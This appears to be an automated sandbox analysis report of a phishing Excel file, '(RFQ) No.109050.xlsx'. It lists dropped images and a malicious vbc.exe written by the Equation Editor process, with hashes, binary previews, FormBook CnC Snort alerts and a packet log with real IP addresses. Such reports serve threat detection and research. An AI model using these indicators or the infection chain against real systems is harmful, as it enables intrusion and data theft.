                                              Preview: .PNG........IHDR..............I.M....IDATx....T.]...G.;..nuww7.s...U..K......Ih....q!i...K....t.'k.W..i..>.......B.....E.0....f.a.....e....++...P..|..^...L.S}r:..............sM....p..p-..y]...t7'.D)....../...k....pzos.......6;,..H.....U..a..9..1...$......*.kI<..\F...$.E....?[B(.9.....H..!.....0AV..g.m...23..C..g(.%...6..>.O.r...L..t1.Q-.bE......)........|i ..."....V.g.\.G..p..p.X[.....*%hyt...@..J...~.p.....|..>...~.`..E_...*.iU.G...i.O..r6...iV.....@..........Jte...5Q.P.v;..B.C...m......0.N......q...b.....Q...c.moT.e6OB...p.v"...."........9..G....B}...../m...0g...8......6.$.$]p...9.....Z.a.sr.;B.a....m...>...b..B..K...{...+w?....B3...2...>.......1..-.'.l.p........L....\.K..P.q......?>..fd.`w*..y..|y..,.....i..'&.?.....).e.D ?.06......U.%.2t........6.:..D.B....+~.....M%".fG]b\.[........1....".......GC6.....J.+......r.a...ieZ..j.Y...3..Q*m.r.urb.5@.e.v@@....gsb.{q-..3j........s.f.|8s$p.?3H......0`..6)...bD....^..+....9..;$...W::.jBH..!tK
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\45F1FF87.emf
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                              Category:dropped
                                              Size (bytes):648132
                                              Entropy (8bit):2.8123660050383266
                                              Encrypted:false
                                              SSDEEP:3072:u34UL0tS6WB0JOqFB5AEA7rgXuzqn8nG/qc+5:g4UcLe0JOcXuunhqcS
                                              MD5:E48BF4960F779FF5CD42B9143833B42F
                                              SHA1:7DA5EF13228B3557115ADFAA174E30339B3BB83A
                                              SHA-256:D7AE3B836541DA12D810FA9F15513160FE1CD7F362364A5579058DCAC07D8D0A
                                              SHA-512:F899C259D8BC55392116F12F0BF652358562948037754E17BFABEEF89FAA1B22A60D398249B1B21F5E0845F9691BD70CD5727FBC37257465FC590BD15CF5F25B
                                              Malicious:false
                                              Preview: ....l...........................m>...!.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i.....................................................DY$...T.S.-zMY.@..%...0.S.t.S.......S.X.S..N.Z..S...S.....@.S...S..N.Z..S...S. ....yMY..S...S. ............zMY........................................%...X...%...7...................{$..................C.a.l.i.b.r.i...........d.S.X.....S...S............vdv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@............L.......................P... ...6...F...$.......EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\480E59C3.jpeg
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3
                                              Category:dropped
                                              Size (bytes):14198
                                              Entropy (8bit):7.916688725116637
                                              Encrypted:false
                                              SSDEEP:384:lboF1PuTfwKCNtwsU9SjUB7ShYIv7JrEHaeHj7KHG81I:lboFgwK+wD9SA7ShX7JrEL7KHG8S
                                              MD5:E8FC908D33C78AAAD1D06E865FC9F9B0
                                              SHA1:72CA86D260330FC32246D28349C07933E427065D
                                              SHA-256:7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
                                              SHA-512:A005677A2958E533A51A95465308F94BE173F93264A2A3DB58683346CA97E04F14567D53D0066C1EAA33708579CD48B8CD3F02E1C54F126B7F3C4E64AC196E17
                                              Malicious:false
                                              Preview: ......JFIF.................................... .... !....!..!) ..&.".#1!&)+... "383-7(-.-...........-...------0--------+-------------------+--------------........M..".......................................E......................!...1A"Q.aq..2B..#R..3b...$r..C......4DSTcs..................................................Q.A............?...f.t..Q ]....i".G.2....}....m..D..."......Z.*5..5...CPL..W..o7....h.u..+.B...R.S.I. ..m...8.T...(.YX.St.@r..ca...|5.2...*..%..R.A67.........{....X.;...4.D.o'..R...sV8....rJm....2Est-.......U.@......|j.4.mn..Ke!G.6*PJ.S>..0....q%..... .....@...T.P.<...q.z.e....((H+. ..@$...'..?..h.P.]...ZP.H..l?s2l.$.N..?xP..c...@....A..D.l......1...[q*[5(-.J..@...$..N....x.U.fHY!..PM..[.P........aY.....S.R.....Y...(D.|..10........... ..l..|F...E9*...RU:.P...p$.'......2.s.-....a&.@..P.....m..........L.a.H;Dv)...@u...s.,.h..6..Y,....D.7....,.UHe.s..PQ.Ym....)..(y.6.u...i.*V.'2`....&.... ^...8.+]K)R...\.'A...I..B..?[.:.L(c3J..%..$.3..E0@...."5fj...
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4E372F4E.png
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):84203
                                              Entropy (8bit):7.979766688932294
                                              Encrypted:false
                                              SSDEEP:1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
                                              MD5:208FD40D2F72D9AED77A86A44782E9E2
                                              SHA1:216B99E777ED782BDC3BFD1075DB90DFDDABD20F
                                              SHA-256:CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
                                              SHA-512:7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
                                              Malicious:false
                                              Preview: .PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u|0a.....].R.z...2......GJY|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..|...=.|K...w...}O..{|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..|j.....b.r7.O!F...c'......$...)....|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq|.0...e.v......17...:F
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\67A5C24A.jpeg
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
                                              Category:dropped
                                              Size (bytes):8815
                                              Entropy (8bit):7.944898651451431
                                              Encrypted:false
                                              SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
                                              MD5:F06432656347B7042C803FE58F4043E1
                                              SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
                                              SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
                                              SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
                                              Malicious:false
                                              Preview: ......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7CC89F36.png
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:PNG image data, 684 x 477, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):33795
                                              Entropy (8bit):7.909466841535462
                                              Encrypted:false
                                              SSDEEP:768:mEWnXSo70x6wlKcaVH1lvLUlGBtadJubNT4Bw:mTDQx6XH1lvYlbdJux4Bw
                                              MD5:613C306C3CC7C3367595D71BEECD5DE4
                                              SHA1:CB5E280A2B1F4F1650040842BACC9D3DF916275E
                                              SHA-256:A76D01A33A00E98ACD33BEE9FBE342479EBDA9438C922FE264DC0F1847134294
                                              SHA-512:FCA7D4673A173B4264FC40D26A550B97BD3CC8AC18058F2AABB717DF845B84ED32891F97952D283BE678B09B2E0D31878856C65D40361CC5A5C3E3F6332C9665
                                              Malicious:false
                                              Preview: .PNG........IHDR..............T+....)iCCPicc..x..gP......}..m....T).HYz.^E...Y."bC..D..i. ...Q).+.X...X.,....."*(.G.L.{'?..z.w.93..".........~....06|G$/3........Q@.......%:&.......K....\............JJ.. ........@n..3./...f._>..L~...... ......{..T.|ABlL..?-V...ag.......>.......W..@..+..pHK..O.....o....................w..F.......,...{....3......].xY..2....( .L..EP.-..c0.+..'p.o..P..<....C....(.........Z...B7\.kp...}..g .)x.......!"t... J.:...#...qB<.?$..@.T$..Gv"%H9R.4 -.O....r..F. ..,.'...P..D.P....\...@.qh.....{.*..=.v....(*D...`T..)cz..s...0,..c[.b..k..^l.{...9.3..c..8=........2p[q....I\.....7...}....x].%...........f|'..~.?..H .X.M.9...JH$l&....:.W..I...H.!......H..XD.&."^!.....HT....L.#...H..V.e..i..D.#..-...h.&r....K.G."/Q.)..kJ.%...REi...S.S.T.....@.N.....NP?.$h:4.Z8-...v.v.....N.k...at.}/..~....I.!./.&.-.M.V.KdD.(YT].+.A4O.R...=.91.....X..V.Z..bcb...q#qo...R.V...3.D...'.h.B.c..%&..C....1v2..7.SL.S...Ld.0O3.....&.A......$.,...rc%..XgY.X_....R1R{..F.....
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A26CB4E2.jpeg
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3
                                              Category:dropped
                                              Size (bytes):14198
                                              Entropy (8bit):7.916688725116637
                                              Encrypted:false
                                              SSDEEP:384:lboF1PuTfwKCNtwsU9SjUB7ShYIv7JrEHaeHj7KHG81I:lboFgwK+wD9SA7ShX7JrEL7KHG8S
                                              MD5:E8FC908D33C78AAAD1D06E865FC9F9B0
                                              SHA1:72CA86D260330FC32246D28349C07933E427065D
                                              SHA-256:7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
                                              SHA-512:A005677A2958E533A51A95465308F94BE173F93264A2A3DB58683346CA97E04F14567D53D0066C1EAA33708579CD48B8CD3F02E1C54F126B7F3C4E64AC196E17
                                              Malicious:false
                                              Preview: ......JFIF.................................... .... !....!..!) ..&.".#1!&)+... "383-7(-.-...........-...------0--------+-------------------+--------------........M..".......................................E......................!...1A"Q.aq..2B..#R..3b...$r..C......4DSTcs..................................................Q.A............?...f.t..Q ]....i".G.2....}....m..D..."......Z.*5..5...CPL..W..o7....h.u..+.B...R.S.I. ..m...8.T...(.YX.St.@r..ca...|5.2...*..%..R.A67.........{....X.;...4.D.o'..R...sV8....rJm....2Est-.......U.@......|j.4.mn..Ke!G.6*PJ.S>..0....q%..... .....@...T.P.<...q.z.e....((H+. ..@$...'..?..h.P.]...ZP.H..l?s2l.$.N..?xP..c...@....A..D.l......1...[q*[5(-.J..@...$..N....x.U.fHY!..PM..[.P........aY.....S.R.....Y...(D.|..10........... ..l..|F...E9*...RU:.P...p$.'......2.s.-....a&.@..P.....m..........L.a.H;Dv)...@u...s.,.h..6..Y,....D.7....,.UHe.s..PQ.Ym....)..(y.6.u...i.*V.'2`....&.... ^...8.+]K)R...\.'A...I..B..?[.:.L(c3J..%..$.3..E0@...."5fj...
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D1E599BF.png
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):84203
                                              Entropy (8bit):7.979766688932294
                                              Encrypted:false
                                              SSDEEP:1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
                                              MD5:208FD40D2F72D9AED77A86A44782E9E2
                                              SHA1:216B99E777ED782BDC3BFD1075DB90DFDDABD20F
                                              SHA-256:CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
                                              SHA-512:7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
                                              Malicious:false
                                              Preview: .PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u|0a.....].R.z...2......GJY|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..|...=.|K...w...}O..{|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..|j.....b.r7.O!F...c'......$...)....|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq|.0...e.v......17...:F
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DEB48925.jpeg
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
                                              Category:dropped
                                              Size (bytes):8815
                                              Entropy (8bit):7.944898651451431
                                              Encrypted:false
                                              SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
                                              MD5:F06432656347B7042C803FE58F4043E1
                                              SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
                                              SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
                                              SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
                                              Malicious:false
                                              Preview: ......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E17CBBC9.png
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:PNG image data, 613 x 80, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):6815
                                              Entropy (8bit):7.871668067811304
                                              Encrypted:false
                                              SSDEEP:96:pJzjDc7s5VhrOxAUp8Yy5196FOMVsoKZkl3p1NdBzYPx7yQgtCPe1NSMjRP9:ppDc7sk98YM19SC/27QptgtCPWkUl
                                              MD5:E2267BEF7933F02C009EAEFC464EB83D
                                              SHA1:ACFEECE4B83B30C8B38BEB4E5954B075EAF756AE
                                              SHA-256:BF5DF4A66D0C02D43BB4AC423D0B50831A83CDB8E8C23CF36EAC8D79383AA2A7
                                              SHA-512:AB1C3C23B5533C5A755CCA7FF6D8B8111577ED2823224E2E821DD517BC4E6D2B6E1353B1AFEAC6DB570A8CA1365F82CA24D5E1155C50B12556A1DF25373620FF
                                              Malicious:false
                                              Preview: .PNG........IHDR...e...P.....X.......sBIT.....O.....sRGB.........gAMA......a.....pHYs..........+......tEXtSoftware.gnome-screenshot...>....IDATx^..tT....?.$.(.C..@.Ah.Z4.g...5[Vzv.v[9.=..KOkkw......(v.b..kYJ[.]...U...T$....!.....3....y3y....$.d....y..{....}....{.{..._6p#.. .. .. ..H(......I..H..H..H..4..c.l.E.B.$@.$@.$@.$0.........O[.9e......7......"''g.Da.$@.$@.$@.$0v.x.^....{..=...3..a0\7.|...5())...}<vIQs. .. .. .....K>].........3..K.[.nE..Q..E............._2.k...4l.)........p............eK..S..[w^..YX...4.\]]]....w.....H..H..H...E`.)..*n.\...Sw.?..O..LM...H..`F$@.$@.$@.$.4..Nv.Hh...OV......9..(.........@..L..<..ef&..;.S..=..MifD.$@.$@.$@.N#.1i..D...qO.S.....rY.oc...|.-..X./.].].rm.V<..l..U.q>v.1.G.}h+Z"...S..r.X..S.#x...FokVv.L.&.....8. 9.3m.6@.p..8.#...|.RiNY.+.b...E.W.8^..o....;'..\.}........|F.8V....x.8^~.>\..S....o..j.....m..I.....B.ZN....6\b.G...X.5....Or!...m.6@......yL.>.!R.\. ...._.....7..G.i.e.......9..r..[F.r.....P4.e.k.{..@].......
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\ED48C3DC.emf
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                              Category:dropped
                                              Size (bytes):7788
                                              Entropy (8bit):5.5374935868044926
                                              Encrypted:false
                                              SSDEEP:96:wQ2CHOvlJaX1/0qMfZoL/GuoOfaDda/ZbjsSZdb3Cim3n+KeXI:wdTrZuloOSGZboS/C93n+KuI
                                              MD5:4FC415C6424FF953F66A5D5E8BDEC1CA
                                              SHA1:DBB592681E36BB66D6FB8715CF9AFC38E4E73944
                                              SHA-256:AEADE713C14333879F98061E55CF9AF0C211A279A66601DA979D00D41FEFF6EA
                                              SHA-512:40225FAA118A318C4B53D74E5C4B1C6373CD95726DEB8A6FCFD81517B781C43C97B1410089DABDD51E04612921EA4B5DD6094168483233474C94F64EE78CA431
                                              Malicious:false
                                              Preview: ....l...).......u...<.........../....... EMF....l...........................8...X....................?..................................C...R...p...................................S.e.g.o.e. .U.I...................................................;.6.).X.......d.......................@.....p....\.....................p........<5.u..p....`.p`m;.$y.w..D................w..D.$.......d.......$....^.p.....^.p..D...D...C.....-........<.w................<.9u.Z.v....X.a....`m;........................vdv......%...................................r...................'...........(...(..................?...........?................l...4...........(...(...(...(...(..... .........................................................................................................................................................................................................................................HD>^JHCcNJFfNJFiPMHlRPJoTPLrWQLvYRPxZUR{]XP~]WS.^ZS.`[T.c\U.e^U.e]W.g`Y.hbY.j`Y.ib\.ld].kd].nd^.nf^.
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F219DE41.png
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:PNG image data, 684 x 477, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):33795
                                              Entropy (8bit):7.909466841535462
                                              Encrypted:false
                                              SSDEEP:768:mEWnXSo70x6wlKcaVH1lvLUlGBtadJubNT4Bw:mTDQx6XH1lvYlbdJux4Bw
                                              MD5:613C306C3CC7C3367595D71BEECD5DE4
                                              SHA1:CB5E280A2B1F4F1650040842BACC9D3DF916275E
                                              SHA-256:A76D01A33A00E98ACD33BEE9FBE342479EBDA9438C922FE264DC0F1847134294
                                              SHA-512:FCA7D4673A173B4264FC40D26A550B97BD3CC8AC18058F2AABB717DF845B84ED32891F97952D283BE678B09B2E0D31878856C65D40361CC5A5C3E3F6332C9665
                                              Malicious:false
                                              Preview: .PNG........IHDR..............T+....)iCCPicc..x..gP......}..m....T).HYz.^E...Y."bC..D..i. ...Q).+.X...X.,....."*(.G.L.{'?..z.w.93..".........~....06|G$/3........Q@.......%:&.......K....\............JJ.. ........@n..3./...f._>..L~...... ......{..T.|ABlL..?-V...ag.......>.......W..@..+..pHK..O.....o....................w..F.......,...{....3......].xY..2....( .L..EP.-..c0.+..'p.o..P..<....C....(.........Z...B7\.kp...}..g .)x.......!"t... J.:...#...qB<.?$..@.T$..Gv"%H9R.4 -.O....r..F. ..,.'...P..D.P....\...@.qh.....{.*..=.v....(*D...`T..)cz..s...0,..c[.b..k..^l.{...9.3..c..8=........2p[q....I\.....7...}....x].%...........f|'..~.?..H .X.M.9...JH$l&....:.W..I...H.!......H..XD.&."^!.....HT....L.#...H..V.e..i..D.#..-...h.&r....K.G."/Q.)..kJ.%...REi...S.S.T.....@.N.....NP?.$h:4.Z8-...v.v.....N.k...at.}/..~....I.!./.&.-.M.V.KdD.(YT].+.A4O.R...=.91.....X..V.Z..bcb...q#qo...R.V...3.D...'.h.B.c..%&..C....1v2..7.SL.S...Ld.0O3.....&.A......$.,...rc%..XgY.X_....R1R{..F.....
                                              C:\Users\user\Desktop\~$(RFQ) No.109050.xlsx
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):330
                                              Entropy (8bit):1.4377382811115937
                                              Encrypted:false
                                              SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                              MD5:96114D75E30EBD26B572C1FC83D1D02E
                                              SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                              SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                              SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                              Malicious:true
                                              Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                              C:\Users\Public\vbc.exe
                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):538624
                                              Entropy (8bit):7.1421525751651425
                                              Encrypted:false
                                              SSDEEP:12288:aWHCM2K4CXmePITM0KbDAa8p0MQRqPbPJ3jNWAYH+jbRX2t:23CXXPIQ0gvM9DxtYH+92
                                              MD5:A3F424F32B637CB917E6596FAE56E401
                                              SHA1:9FF12D1CFCA13F94EEDBEB016974ECAE44B56266
                                              SHA-256:32258A09DDCB62EA68D47261889D0E888723AFBAB1BC4A3F137EC2E3C0DC01D4
                                              SHA-512:F238DD5F32E4D862C19F40B5264F0093DD6BBA251DB6FF68FD42D9BE8331111661781DDAB85E0DE3FE4F9B6A919E15782855EE329FE8CCAFB3641523FF0BA0C5
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....................0.............jM... ...`....@.. ....................................@..................................M..O....`...............................L............................................... ............... ..H............text...p-... ...................... ..`.rsrc........`.......0..............@..@.reloc...............6..............@..B................LM......H........?..._......o.......P...........................................~..$}......}......}.....(......*...$}......}......}.....(........}......}....*...0..O.........$}......}......}.....(........{....}......{....}......{....}......{....}....*:..{....(.....*...0..w..........R.{........,f.r...p(....-).r!..p(....-%.r-..p(....-%.r9..p(....-%+0..}....+'..J.{....XT+...J.{....XT+...J.{....XT+.*..0...........rE..p.+..*..0...........r...p.+..*..0..................+..*".(.....*....0..

                                              Static File Info

                                              General

                                              File type:CDFV2 Encrypted
                                              Entropy (8bit):7.987872651324991
                                              TrID:
                                              • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                              File name:(RFQ) No.109050.xlsx
                                              File size:596992
                                              MD5:34cc835409afb805f20b811796d3b1fd
                                              SHA1:90b0fe9c48bb9915e2202e905baa3029ebc6f541
                                              SHA256:bb916fab1615d4fab5ba566bd01d7d89eb13c586d8ece170b556f7fc8437658c
                                              SHA512:e9d0366bf5beceead9fa2c1a6895ab9a74a214a9fded46ce1021e1254c6eafb4c6db3c0d55eae94896edbe41de02aa9e7bf76f1dcfa0cd092de4b544c0bb1ac1
                                              SSDEEP:12288:lm/+veTAqlDk+dodQ9TdIXpyXngu5RR7dc4/uwUR+A4hFYSAj542ds4Ca6:02eTA6fw2dTXngu5RR7hA4rTg4264L6
                                              File Content Preview:........................>......................................................................................................................................................................................................................................

                                              File Icon

                                              Icon Hash:e4e2aa8aa4b4bcb4

                                              Network Behavior

                                              Snort IDS Alerts

                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                              09/15/21-11:43:28.657859TCP2031453ET TROJAN FormBook CnC Checkin (GET)4916780192.168.2.2234.102.136.180
                                              09/15/21-11:43:28.657859TCP2031449ET TROJAN FormBook CnC Checkin (GET)4916780192.168.2.2234.102.136.180
                                              09/15/21-11:43:28.657859TCP2031412ET TROJAN FormBook CnC Checkin (GET)4916780192.168.2.2234.102.136.180
                                              09/15/21-11:43:28.772925TCP1201ATTACK-RESPONSES 403 Forbidden804916734.102.136.180192.168.2.22
                                              09/15/21-11:43:39.395982TCP1201ATTACK-RESPONSES 403 Forbidden804916934.98.99.30192.168.2.22

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Sep 15, 2021 11:41:57.230140924 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:57.401886940 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:57.401978970 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:57.402611017 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:57.576512098 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:57.576544046 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:57.576561928 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:57.576575994 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:57.576673985 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:57.751707077 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:57.751804113 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:57.751828909 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:57.751878023 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:57.751900911 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:57.751923084 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:57.751945019 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:57.751966000 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:57.751998901 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:57.752055883 CEST4916580192.168.2.22198.12.84.109
